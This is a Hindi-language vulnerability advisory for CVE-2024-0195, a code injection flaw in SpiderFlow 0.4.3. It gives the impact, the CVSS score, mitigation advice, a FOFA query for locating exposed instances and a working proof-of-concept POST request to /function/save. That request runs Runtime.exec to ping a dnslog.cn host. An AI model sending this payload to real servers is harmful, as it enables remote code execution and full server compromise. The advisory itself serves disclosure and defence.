
CVE-2024-0195 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, SpiderFlow 0.4.3 में एक महत्वपूर्ण कोड इंजेक्शन भेद्यता जो FunctionService.saveFunction समापन बिंदु के माध्यम से दूरस्थ कोड निष्पादन सक्षम करता है।
CVE-2024-0195 स्पाइडर-फ्लो 0.4.3 वेब एप्लिकेशन में एक क्रिटिकल कोड इंजेक्शन भेद्यता है, विशेष रूप से FunctionController.java फ़ाइल के FunctionService.saveFunction फंक्शन में। एक हमलावर दूरस्थ रूप से दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है जो सर्वर पर निष्पादित होता है। यह एप्लिकेशन के पूर्ण समझौते की अनुमति देता है।
यह भेद्यता अत्यंत गंभीर है क्योंकि यह कमजोर स्पाइडर-फ्लो एप्लिकेशन होस्ट करने वाले सर्वर पर रिमोट कोड निष्पादन की अनुमति देती है। एक हमलावर सर्वर को पूरी तरह से समझौता कर सकता है, संवेदनशील डेटा चुरा सकता है, मैलवेयर या क्रिप्टो माइनर स्थापित कर सकता है, और नेटवर्क के अंदर आगे के हमलों के लिए इसका उपयोग कर सकता है। एप्लिकेशन और सर्वर की गोपनीयता, अखंडता और उपलब्धता सभी गंभीर रूप से प्रभावित होती हैं।
एक पैच किए गए संस्करण का स्पष्ट रूप से उल्लेख नहीं किया गया है, इसलिए वर्तमान में पैचिंग एक विकल्प नहीं लगता है। भेद्यता सार्वजनिक रूप से खुलासा किया गया था और एक्सप्लॉइट उपलब्ध हैं, इसलिए तत्काल शमन महत्वपूर्ण है।
जब तक कोई आधिकारिक पैच जारी नहीं किया जाता, तब तक स्पाइडर-फ्लो 0.4.3 को तुरंत ऑफ़लाइन ले लिया जाना चाहिए या केवल विश्वसनीय नेटवर्क/उपयोगकर्ताओं तक पहुंच प्रतिबंधित की जानी चाहिए। वेब एप्लिकेशन फायरवॉल या अन्य इनपुट सत्यापन नियंत्रणों को संभावित रूप से कोड इंजेक्शन हमलों का पता लगाने और ब्लॉक करने के लिए एक अंतरिम शमन के रूप में कॉन्फ़िगर किया जा सकता है। हालांकि, ये पूर्ण समाधान नहीं हैं और जैसे ही कोई फिक्स्ड रिलीज़ उपलब्ध हो, कमजोर संस्करण को अपग्रेड किया जाना चाहिए।
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ प्रूफ ऑफ कॉन्सेप्ट
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B